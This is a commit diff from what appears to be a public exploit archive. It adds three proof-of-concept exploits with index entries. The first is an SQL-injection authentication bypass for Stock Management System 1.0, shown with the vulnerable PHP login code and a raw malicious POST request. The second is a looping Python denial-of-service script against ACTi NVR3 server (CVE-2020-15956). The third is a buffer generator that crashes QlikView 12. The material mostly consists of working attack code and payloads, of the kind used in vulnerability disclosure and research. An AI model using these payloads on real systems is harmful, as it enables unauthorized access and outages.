DB: 2020-08-06

3 changes to exploits/shellcodes ACTi NVR3 Standard or Professional Server 3.0.12.42 - Denial of Service (PoC) QlikView 12.50.20000.0 - 'FTP Server Address' Denial of Service (PoC) Stock Management System 1.0 - Authentication Bypass
2020-08-06 05:01:49 +00:00 · 2020-08-06 05:01:49 +00:00 · b4336a2935
commit b4336a2935
parent 9384c59418
4 changed files with 139 additions and 0 deletions
--- a/exploits/php/webapps/48733.txt
+++ b/exploits/php/webapps/48733.txt
@ -0,0 +1,71 @@
+# Exploit Title: Stock Management System 1.0 - Authentication Bypass
+# Exploit Author: Adeeb Shah (@hyd3sec)
+# Date: August 1, 2020
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html
+# Version: 1.0
+# Tested On: Windows 10 (x64_86) + XAMPP 7.4.4
+
+# Vulnerable Source Code
+
+
+if($_POST) {		
+
+	$username = $_POST['username'];
+	$password = $_POST['password'];
+
+	if(empty($username) || empty($password)) {
+		if($username == "") {
+			$errors[] = "Username is required";
+		} 
+
+		if($password == "") {
+			$errors[] = "Password is required";
+		}
+	} else {
+		$sql = "SELECT * FROM users WHERE username = '$username'";
+		$result = $connect->query($sql);
+
+		if($result->num_rows == 1) {
+			$password = md5($password);
+			// exists
+			$mainSql = "SELECT * FROM users WHERE username = '$username' AND password = '$password'";
+			$mainResult = $connect->query($mainSql);
+
+			if($mainResult->num_rows == 1) {
+				$value = $mainResult->fetch_assoc();
+				$user_id = $value['user_id'];
+
+				// set session
+				$_SESSION['userId'] = $user_id;
+
+				header('location: http://localhost/stock/dashboard.php');	
+			} else{
+				
+				$errors[] = "Incorrect username/password combination";
+			} // /else
+		} else {		
+			$errors[] = "Username doesnot exists";		
+		} // /else
+	} // /else not empty username // password
+	
+} // /if $_POST
+?>
+
+
+# Malicious POST Request to https://TARGET/stock/index.php HTTP/1.1
+POST /stock/index.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.222.132/stock/
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 47
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=j3j54s5keclr8ol2ou4f9b518s
+Upgrade-Insecure-Requests: 1
+
+email='+or+1%3d1+--+admin&password=badPass
--- a/exploits/windows/dos/48731.py
+++ b/exploits/windows/dos/48731.py
@ -0,0 +1,41 @@
+# Exploit Title: ACTi NVR3 Standard or Professional Server 3.0.12.42 - Denial of Service (PoC)  #
+# Date: 2020-08-04                                                              #
+# Exploit Author: MegaMagnus                                                    #
+# Vendor Homepage: https://www.acti.com/                                        #
+# Software Link: https://www.acti.com/DownloadCenter                            #
+# Version: V.3.0.12.42 , V.2.3.04.07                                            #
+# Tested on: Windows 7, Windows 10                                              #
+# CVE: CVE-2020-15956                                                           #
+# This is a Proof of Concept Exploit, Please use responsibly.                   #
+#################################################################################
+
+#!/usr/bin/env python
+import requests
+from requests.auth import HTTPBasicAuth
+import sys
+
+def product_info(server):
+    try:
+        r = requests.get(sys.argv[1] + '/media/Product/getProductInfo', timeout=10)
+        if r.status_code == 200:
+            print(r.text)
+            return True
+    except Exception as e:
+        print(e)
+    return False
+
+if __name__ == "__main__":
+    if len(sys.argv) != 2:
+        print("usage: cve-2020-15956.py <target>")
+        exit(-1)
+    if product_info(sys.argv[1]):
+        print("Starting DOS. Use Ctrl-C (SIGINT) to stop!")
+        while True:
+            try:
+                payload = b"\x00" * (760)
+                r = requests.get(sys.argv[1] + '/Media/UserGroup/login', auth=HTTPBasicAuth('Basic',payload), timeout=10)
+                print(r.status_code)
+            except KeyboardInterrupt:
+                pass
+            except Exception as e:
+                pass
--- a/exploits/windows/dos/48732.py
+++ b/exploits/windows/dos/48732.py
@ -0,0 +1,24 @@
+# Exploit Title: QlikView 12.50.20000.0 - 'FTP Server Address' Denial of Service (PoC)
+# Discovery by: Luis Martinez
+# Discovery Date: 2020-08-03
+# Vendor Homepage: https://www.qlik.com
+# Software Link: https://www.qlik.com/us/trial/qlik-sense-business
+# Tested Version: 12.50.20000.0
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to Produce the Crash:
+# 1.- Run python code: QlikView_12.50.20000.0.py
+# 2.- Open QlikView_12.50.20000.0.txt and copy content to clipboard
+# 3.- Open "QlikView 12"
+# 4.- File -> "Open FTP ..."
+# 5.- Paste ClipBoard on "FTP Server Address"
+# 6.- Connect
+# 7.- Crashed
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 300
+f = open ("QlikView_12.50.20000.0.txt", "w")
+f.write(buffer)
+f.close()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6757,6 +6757,8 @@ id,file,description,date,author,type,platform,port
 48697,exploits/windows/dos/48697.py,"Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)",2020-07-26,"Felipe Winsnes",dos,windows,
 48728,exploits/windows/dos/48728.py,"Mocha Telnet Lite for iOS 4.2 - 'User' Denial of Service (PoC)",2020-08-04,"Luis Martínez",dos,windows,
 48729,exploits/windows/dos/48729.py,"RTSP for iOS 1.0 - 'IP Address' Denial of Service (PoC)",2020-08-04,"Luis Martínez",dos,windows,
+48731,exploits/windows/dos/48731.py,"ACTi NVR3 Standard or Professional Server 3.0.12.42 - Denial of Service (PoC)",2020-08-05,MegaMagnus,dos,windows,
+48732,exploits/windows/dos/48732.py,"QlikView 12.50.20000.0 - 'FTP Server Address' Denial of Service (PoC)",2020-08-05,"Luis Martínez",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -42972,3 +42974,4 @@ id,file,description,date,author,type,platform,port
 48725,exploits/php/webapps/48725.txt,"Online Shopping Alphaware 1.0 - Authentication Bypass",2020-07-30,"Ahmed Abbas",webapps,php,
 48727,exploits/python/webapps/48727.py,"Pi-hole 4.3.2 - Remote Code Execution (Authenticated)",2020-08-04,"Luis Vacacas",webapps,python,
 48730,exploits/php/webapps/48730.py,"Daily Expenses Management System 1.0 - 'username' SQL Injection",2020-08-04,"Daniel Ortiz",webapps,php,
+48733,exploits/php/webapps/48733.txt,"Stock Management System 1.0 - Authentication Bypass",2020-08-05,"Adeeb Shah",webapps,php,